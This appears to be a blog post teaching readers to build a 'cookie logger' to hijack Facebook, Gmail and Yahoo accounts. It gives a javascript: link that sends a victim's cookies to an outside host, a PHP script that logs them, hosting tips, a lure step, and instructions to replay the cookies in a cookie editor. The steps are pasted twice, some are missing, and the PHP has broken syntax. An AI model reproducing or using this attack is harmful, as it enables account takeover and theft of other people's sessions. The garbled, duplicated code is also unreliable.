Cookie logger to hack fb,gmail,yahoo etc
A Cookie Logger is a Script that is used to steal anybody’s Cookies and
stores it into a Log File from where you can read the Cookies of the
Victim. Today I am going to show How to make your own Cookie Logger…
Give this of code to victim to run in his browser (notice that here site name is
http://wtzhacks.heck.in/ so replace or change it with your site name)
javascript:document.location=' http://wtzhacks.heck.in /cookielogger.php?ex='.concat(escape(document.cookie));
STEP 2: Copy the Following Script into a Notepad File and save the file as
cookielogger.php
<?php
$filename = "logfile.txt";
if (isset($_GET["ex"]))
{
if (!$handle = fopen($filename, 'a'
)
{
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
{
exit;
}
}
header("Location: http://www.google.com"
;
fclose($handle);
exit;
}
exit;
?>
STEP 3: Create a new Notepad File and Save it as logfile.txt
STEP 4: Upload these files to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
If you don’t have any Website then you can use the following Website to get a Free Website which has PHP support:
http://www.0fees.net/signup.php
now its ready give the link to victim & it will se gif image in fb and he click on the link (now cokkies is hacked)
STEP 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a Firefox add-on named "Cookie Manager + "
Give this of code to victim to run in his browser (notice that here site name is
http://wtzhacks.heck.in/ so replace or change it with your site name)
javascript:document.location=' http://wtzhacks.heck.in /cookielogger.php?ex='.concat(escape(document.cookie));
STEP 2: Copy the Following Script into a Notepad File and save the file as
cookielogger.php
<?php
$filename = "logfile.txt";
if (isset($_GET["ex"]))
{
if (!$handle = fopen($filename, 'a'
{
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
{
exit;
}
}
header("Location: http://www.google.com"
fclose($handle);
exit;
}
exit;
?>
STEP 3: Create a new Notepad File and Save it as logfile.txt
STEP 4: Upload these files to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
If you don’t have any Website then you can use the following Website to get a Free Website which has PHP support:
http://www.0fees.net/signup.php
now its ready give the link to victim & it will se gif image in fb and he click on the link (now cokkies is hacked)
STEP 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a Firefox add-on named "Cookie Manager + "
Cookie logger to hack fb,gmail,yahoo etc
Reviewed by Unknown
on
7:50 AM
Rating:
No comments: